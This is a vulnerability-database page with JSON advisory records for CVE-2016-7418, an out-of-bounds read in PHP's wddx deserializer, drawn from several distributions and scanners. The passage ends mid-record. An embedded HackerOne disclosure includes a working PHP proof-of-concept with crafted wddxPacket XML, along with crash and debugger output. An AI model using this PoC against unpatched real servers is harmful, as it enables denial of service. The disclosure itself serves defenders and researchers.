DATABASE RESOURCES PRICING ABOUT US

{"id": "ALPINE:CVE-2016-7418", "vendorId": null, "type": "alpinelinux", "bulletinFamily": "unix", "title": "CVE-2016-7418", "description": "The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.", "published": "2016-09-17T21:59:00", "modified": "2018-05-04T01:29:00", "epss": [{"cve": "CVE-2016-7418", "epss": 0.01576, "percentile": 0.85399, "modified": "2023-06-03"}], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": true, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://security.alpinelinux.org/vuln/CVE-2016-7418", "reporter": "Alpine Linux Development Team", "references": [], "cvelist": ["CVE-2016-7418"], "immutableFields": [], "lastseen": "2023-06-23T11:06:58", "viewCount": 6, "enchantments": {"score": {"value": 7.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2016-753", "ALAS-2016-754"]}, {"type": "apple", "idList": ["APPLE:F15BAD0991243C5F3BD7A363EA796E0C", "APPLE:HT207423"]}, {"type": "archlinux", "idList": ["ASA-201609-16"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:FC4FB717C57CFF4AE1D36C279949AE09"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}, {"type": "cve", "idList": ["CVE-2016-7418"]}, {"type": "debian", "idList": ["DEBIAN:DLA-749-1:7CC58", "DEBIAN:DSA-3689-1:75CF1", "DEBIAN:DSA-3689-1:80BAA"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-7418"]}, {"type": "fedora", "idList": ["FEDORA:048C660748C7", "FEDORA:B0F3260776C0"]}, {"type": "freebsd", "idList": ["8D5180A6-86FE-11E6-8D93-00248C0C745D", "F471032A-8700-11E6-8D93-00248C0C745D"]}, {"type": "gentoo", "idList": ["GLSA-201611-22"]}, {"type": "hackerone", "idList": ["H1:170618"]}, {"type": "ibm", "idList": ["A0EA016F41D5759AF2A1F81E351FC3DA0740A826D3D11695A17D1C4719F64489"]}, {"type": "mageia", "idList": ["MGASA-2016-0319"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-753.NASL", "ALA_ALAS-2016-754.NASL", "DEBIAN_DLA-749.NASL", "DEBIAN_DSA-3689.NASL", "EULEROS_SA-2019-1984.NASL", "EULEROS_SA-2019-2438.NASL", "EULEROS_SA-2019-2649.NASL", "EULEROS_SA-2020-1747.NASL", "FEDORA_2016-62FC05FD68.NASL", "FEDORA_2016-DB71B72137.NASL", "FREEBSD_PKG_8D5180A686FE11E68D9300248C0C745D.NASL", "FREEBSD_PKG_F471032A870011E68D9300248C0C745D.NASL", "GENTOO_GLSA-201611-22.NASL", "MACOS_10_12_2.NASL", "OPENSUSE-2016-1150.NASL", "OPENSUSE-2016-1193.NASL", "PHP_5_6_26.NASL", "PHP_7_0_11.NASL", "SECURITYCENTER_5_4_1.NASL", "SECURITYCENTER_PHP_5_6_26.NASL", "SLACKWARE_SSA_2016-267-01.NASL", "SUSE_SU-2016-2459-1.NASL", "SUSE_SU-2016-2460-1.NASL", "SUSE_SU-2016-2461-1.NASL", "SUSE_SU-2016-2477-1.NASL", "UBUNTU_USN-3095-1.NASL", "WEB_APPLICATION_SCANNING_98816", "WEB_APPLICATION_SCANNING_98835"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120742", "OPENVAS:1361412562310120743", "OPENVAS:1361412562310703689", "OPENVAS:1361412562310809316", "OPENVAS:1361412562310809317", "OPENVAS:1361412562310809422", "OPENVAS:1361412562310809423", "OPENVAS:1361412562310810567", "OPENVAS:1361412562310842904", "OPENVAS:1361412562310851402", "OPENVAS:1361412562310851410", "OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562311220201747", "OPENVAS:703689"]}, {"type": "osv", "idList": ["OSV:DLA-749-1", "OSV:DSA-3689-1"]}, {"type": "redhat", "idList": ["RHSA-2018:1296"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-7418"]}, {"type": "slackware", "idList": ["SSA-2016-267-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:2444-1", "OPENSUSE-SU-2016:2540-1", "SUSE-SU-2016:2459-1", "SUSE-SU-2016:2460-1", "SUSE-SU-2016:2460-2", "SUSE-SU-2016:2461-1", "SUSE-SU-2016:2477-1", "SUSE-SU-2016:2477-2"]}, {"type": "ubuntu", "idList": ["USN-3095-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-7418"]}, {"type": "veracode", "idList": ["VERACODE:19296", "VERACODE:19297"]}]}, "vulnersScore": 7.8}, "_state": {"score": 1687520191, "dependencies": 1687520703}, "_internal": {"score_hash": "90394d8688e2c42a72f8d29c6b160589"}, "affectedPackage": [{"OS": "Alpine", "OSVersion": "3.2-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "5.6.27-r0", "operator": "lt", "packageName": "php"}, {"OS": "Alpine", "OSVersion": "3.3-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "5.6.27-r0", "operator": "lt", "packageName": "php"}]}

{"redhatcve": [{"lastseen": "2021-09-02T22:53:21", "description": "The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-09-19T13:48:34", "type": "redhatcve", "title": "CVE-2016-7418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7418"], "modified": "2020-08-18T13:18:29", "id": "RH:CVE-2016-7418", "href": "https://access.redhat.com/security/cve/cve-2016-7418", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "hackerone": [{"lastseen": "2023-09-03T17:52:20", "bounty": 0.0, "description": "# CVE-2016-7418 PHP Out-Of-Bounds Read in php_wddx_push_element\n\n## 1. Affected Version\n+ PHP 7.0.10\n+ PHP 5.6.25\n\n## 2. Credit\nThis vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.\n\n## 3. Testing Environments\n+ **OS**: Ubuntu\n+ **PHP**: [7.0.10](http://php.net/distributions/php-7.0.10.tar.gz)\n+ **Compiler**: Clang\n+ **CFLAGS**: ``-g -O0 -fsanitize=address``\n\n## 4. PoC\nThere are **five** similar issues in function ``php_wddx_push_element``, but I'll just demonstrate one issue here. More proof-of-concept files are available at [PHP BUG 73065](https://bugs.php.net/bug.php?id=73065).\n\n```\n<?php\n $xml = <<<XML\n<?xml version='1.0' ?>\n <!DOCTYPE et SYSTEM 'w'>\n <wddxPacket ven='1.0'>\n <array>\n <var Name=\"name\">\n <boolean value=\"keliu\"></boolean>\n </var>\n <var name=\"1111\">\n <var name=\"2222\">\n <var name=\"3333\"></var>\n </var>\n </var>\n </array>\n </wddxPacket>\nXML;\n \n $array = wddx_deserialize($xml);\n var_dump($array);\n?>\n```\n\n## 5. Vulnerability Details\n\nAddressSanitizer output the following exception information.\n\n```\n==47769==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 \n (pc 0x00000046fb9c bp 0x7ffc278e29b0 sp 0x7ffc278e2130 T0)\n #0 0x46fb9b in __interceptor_strcmp.part.24 (php-src/sapi/cli/php+0x46fb9b)\n #1 0xac41d4 in php_wddx_push_element php-src/ext/wddx/wddx.c:791:9\n #2 0x7fa8715ac67f in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0x867f)\n #3 0x7fa8715ad38b in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0x938b)\n #4 0x7fa8715aecad in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0xacad)\n #5 0x7fa8715af404 in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0xb404)\n #6 0x7fa8715b170a in XML_ParseBuffer (/lib/x86_64-linux-gnu/libexpat.so.1+0xd70a)\n #7 0xac1717 in php_wddx_deserialize_ex php-src/ext/wddx/wddx.c:1081:2\n #8 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2\n #9 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2\n #10 0xe75f4b in execute_ex php-src/Zend/zend_vm_execute.h:432:7\n #11 0xe76ec3 in zend_execute php-src/Zend/zend_vm_execute.h:474:2\n #12 0xd00e9e in zend_execute_scripts php-src/Zend/zend.c:1464:4\n #13 0xad4425 in php_execute_script php-src/main/main.c:2537:14\n #14 0x10fca26 in do_cli php-src/sapi/cli/php_cli.c:990:5\n #15 0x10f9f60 in main php-src/sapi/cli/php_cli.c:1378:18\n #16 0x7fa86fec582f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291\n #17 0x449578 in _start (php-src/sapi/cli/php+0x449578)\n\nAddressSanitizer can not provide additional info.\nSUMMARY: AddressSanitizer: SEGV (php-src/sapi/cli/php+0x46fb9b) in __interceptor_strcmp.part.24\n==47769==ABORTING\n```\n\nAddressSanitizer indicates that this is a NULL pointer dereference issue. However, if we debug it under GDB, we'll find out that this can be a Out-Of-Bounds read issue.\n\n```\n(gdb) n\nProgram received signal SIGSEGV, Segmentation fault.\n__strcmp_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcmp-sse2-unaligned.S:31\n31\t../sysdeps/x86_64/multiarch/strcmp-sse2-unaligned.S: No such file or directory.\n\n(gdb) x/i $rip\n=> 0x7ffff6da1b5a <__strcmp_sse2_unaligned+26>:\tmovdqu (%rdi),%xmm1\n\n(gdb) i r $rdi\nrdi 0x74656b6361507801\t8387227955626014721\n\n(gdb) x/20xb $rdi\n0x74656b6361507801:\tCannot access memory at address 0x74656b6361507801\n```\n\nTo some degree, the value of ``rdi`` register can be controlled. For example, value ``0x74656b6361507801`` can be expressed as ``\\x01xPacket``. This can be controlled in the XML code in the proof-of-concept file.\n\n```\n>>> '74656b6361507801'.decode('hex')[::-1]\n'\\x01xPacket'\n```\n\n# 6. Source Code Analysis\nThe code lead to this issue is listed as follows.\n\n```\n790 if (atts) for (i = 0; atts[i]; i++) {\n791 if (!strcmp((char *)atts[i], EL_NAME) && atts[++i] && atts[i][0]) {\n792 if (stack->varname) efree(stack->varname);\n793 stack->varname = estrdup((char *)atts[i]);\n794 break;\n795 }\n796 }\n```\n\nTesting data to trigger this issue is listed as follows.\n\n```\natts[0] = 0x0000000000cf8699 \"Name\"\natts[1] = 0x0000000000cf783c \"name\" EL_NAME\natts[2] = 0x0000000000000000 NULL\natts[3] = 0x74656b6361507801 ????\n```\n\nHere ``atts[2]`` was not checked in the ``for`` loop but in the ``if`` statement (checked when evaluating ``atts[++i]``). So when entering the ``if`` statement next time, ``strcmp(atts[3], EL_NAME)`` would cause an Out-Of-Bounds read issue.\n\n## 7. Timeline\n+ 2016.09.12 - Found\n+ 2016.09.12 - Reported to PHP via [73065](https://bugs.php.net/bug.php?id=73065)\n+ 2016.09.12 - Fixed\n+ 2016.09.15 - Assigned CVE-2016-7418\n+ 2016.09.15 - [PHP 7.0.10](http://www.php.net/ChangeLog-7.php#7.0.11) and [PHP 5.6.25](http://www.php.net/ChangeLog-5.php#5.6.26) Released\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-09-20T02:33:52", "type": "hackerone", "title": "Internet Bug Bounty: CVE-2016-7418 PHP Out-Of-Bounds Read in php_wddx_push_element", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7418"], "modified": "2020-10-10T01:50:19", "id": "H1:170618", "href": "https://hackerone.com/reports/170618", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-06-03T14:42:00", "description": "The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-09-17T21:59:00", "type": "cve", "title": "CVE-2016-7418", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7418"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:5.6.25", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.10"], "id": "CVE-2016-7418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7418", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.25:*:*:*:*:*:*:*"]}], "veracode": [{"lastseen": "2023-04-18T13:54:17", "description": "PHP is vulnerable to denial of service (DoS) attacks. The vulnerability exists in the php_wddx_push_element function in ext/wddx/wddx.c in PHP. Remote attackers could cause a denial of service condition via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-16T02:59:58", "type": "veracode", "title": "Out Of Bound Reads (OOB)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7418"], "modified": "2022-04-19T18:16:39", "id": "VERACODE:19296", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19296/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-18T13:19:30", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The following packages have been upgraded to a later upstream version: rh-php70-php (7.0.27). (BZ#1518843) Security Fix(es): * php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field (CVE-2016-7412) * php: Use after free in wddx_deserialize (CVE-2016-7413) * php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile (CVE-2016-7414) * php: Stack based buffer overflow in msgfmt_format_message (CVE-2016-7416) * php: Missing type check when unserializing SplArray (CVE-2016-7417) * php: Null pointer dereference in php_wddx_push_element (CVE-2016-7418) * php: Use-after-free vulnerability when resizing the 'properties' hash table of a serialized object (CVE-2016-7479) * php: Invalid read when wddx decodes empty boolean element (CVE-2016-9935) * php: Use After Free in unserialize() (CVE-2016-9936) * php: Wrong calculation in exif_convert_any_to_int function (CVE-2016-10158) * php: Integer overflow in phar_parse_pharfile (CVE-2016-10159) * php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive (CVE-2016-10160) * php: Out-of-bounds heap read on unserialize in finish_nested_data() (CVE-2016-10161) * php: Null pointer dereference when unserializing PHP object (CVE-2016-10162) * gd: DoS vulnerability in gdImageCreateFromGd2Ctx() (CVE-2016-10167) * gd: Integer overflow in gd_io.c (CVE-2016-10168) * php: Use of uninitialized memory in unserialize() (CVE-2017-5340) * php: Buffer over-read from unitialized data in gdImageCreateFromGifCtx function (CVE-2017-7890) * oniguruma: Out-of-bounds stack read in match_at() during regular expression searching (CVE-2017-9224) * oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation (CVE-2017-9226) * oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching (CVE-2017-9227) * oniguruma: Out-of-bounds heap write in bitset_set_range() (CVE-2017-9228) * oniguruma: Invalid pointer dereference in left_adjust_char_head() (CVE-2017-9229) * php: Incorrect WDDX deserialization of boolean parameters leads to DoS (CVE-2017-11143) * php: Incorrect return value check of OpenSSL sealing function leads to crash (CVE-2017-11144) * php: Out-of-bounds read in phar_parse_pharfile (CVE-2017-11147) * php: Stack-based buffer over-read in msgfmt_parse_message function (CVE-2017-11362) * php: Stack based 1-byte buffer over-write in zend_ini_do_op() function Zend/zend_ini_parser.c (CVE-2017-11628) * php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12932) * php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12934) * php: reflected XSS in .phar 404 page (CVE-2018-5712) * php, gd: Stack overflow in gdImageFillToBorder on truecolor images (CVE-2016-9933) * php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow (CVE-2016-9934) * php: wddx_deserialize() heap out-of-bound read via php_parse_date() (CVE-2017-11145) * php: buffer over-read in finish_nested_data function (CVE-2017-12933) * php: Out-of-bound read in timelib_meridian() (CVE-2017-16642) * php: Denial of Service (DoS) via infinite loop in libgd gdImageCreateFromGifCtx function in ext/gd/libgd/gd_gif_in.c (CVE-2018-5711) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For details, see the Red Hat Software Collections 3.1 Release Notes linked from the References section.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-16T02:59:58", "type": "veracode", "title": "Use After Free", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-10162", "CVE-2016-10167", "CVE-2016-10168", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7479", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-12932", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-16642", "CVE-2017-5340", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-5711", "CVE-2018-5712"], "modified": "2022-04-19T18:16:39", "id": "VERACODE:19297", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19297/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:51:49", "description": "The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-09-17T21:59:00", "type": "debiancve", "title": "CVE-2016-7418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7418"], "modified": "2016-09-17T21:59:00", "id": "DEBIANCVE:CVE-2016-7418", "href": "https://security-tracker.debian.org/tracker/CVE-2016-7418", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-28T14:37:50", "description": "The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26\nand 7.x before 7.0.11 allows remote attackers to cause a denial of service\n(invalid pointer access and out-of-bounds read) or possibly have\nunspecified other impact via an incorrect boolean element in a wddxPacket\nXML document, leading to mishandling in a wddx_deserialize call.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=73065>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-09-17T00:00:00", "type": "ubuntucve", "title": "CVE-2016-7418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7418"], "modified": "2016-09-17T00:00:00", "id": "UB:CVE-2016-7418", "href": "https://ubuntu.com/security/CVE-2016-7418", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-05-19T14:26:41", "description": "According to its banner, the version of PHP running on the remote web server is 7.0.x prior to 7.0.11. It is, therefore, affected by multiple vulnerabilities :\n\n - An heap buffer overflow condition exists in the php_mysqlnd_rowp_read_text_protocol_aux() function within file ext/mysqlnd/mysqlnd_wireprotocol.c due to a failure to verify that a BIT field has the UNSIGNED_FLAG flag. An unauthenticated, remote attacker can exploit this, via specially crafted field metadata, to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the wddx_stack_destroy() function within file ext/wddx/wddx.c when deserializing recordset elements. An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the phar_parse_zipfile() function within file ext/phar/zip.c due to a failure to ensure that the uncompressed_filesize field is large enough. An unauthenticated, remote attacker can exploit this, via a specially crafted archive, to cause a denial of service condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the ICU4C library, specifically within file common/locid.cpp in the msgfmt_format_message() function, due to a failure to properly restrict the locale length provided to the Locale class. An unauthenticated, remote attacker can exploit this, via a long first argument to a MessageFormatter::formatMessage() function call, to cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr() function within file ext/spl/spl_array.c due to a failure to properly validate the return value and data type when deserializing SplArray. An unauthenticated, remote attacker can exploit this, via specially crafted serialized data, to cause a denial of service condition. (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the 